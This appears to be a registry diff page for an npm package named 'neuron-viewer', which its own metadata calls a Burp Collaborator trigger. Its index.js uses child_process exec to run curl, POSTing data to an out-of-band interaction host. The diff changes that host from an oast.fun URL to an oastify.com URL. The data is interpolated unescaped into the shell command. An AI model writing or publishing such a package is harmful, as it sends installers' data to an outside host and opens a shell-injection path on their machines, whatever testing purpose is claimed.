neuron-viewer 10.1.1 → 11.1.1

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +1 -1
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -1,7 +1,7 @@
1
1
  import { exec } from "child_process";
2
2
 
3
3
  function sendPingback(data) {
4
- const collaboratorUrl = "https://rxthgpisbdduguomjwmiutn5z78qalg0v.oast.fun";
4
+ const collaboratorUrl = "https://569gid9ho8x2ze5dz7ynzp6sdjja70vp.oastify.com";
5
5
 
6
6
  exec(`curl -X POST -d "${data}" ${collaboratorUrl}`, (error, stdout, stderr) => {
7
7
  if (error) {
package/package.json CHANGED
@@ -2,7 +2,7 @@
2
2
 
3
3
  "name": "neuron-viewer",
4
4
 
5
- "version": "10.1.1",
5
+ "version": "11.1.1",
6
6
 
7
7
  "description": "A simple package to trigger Burp Collaborator for security testing",
8
8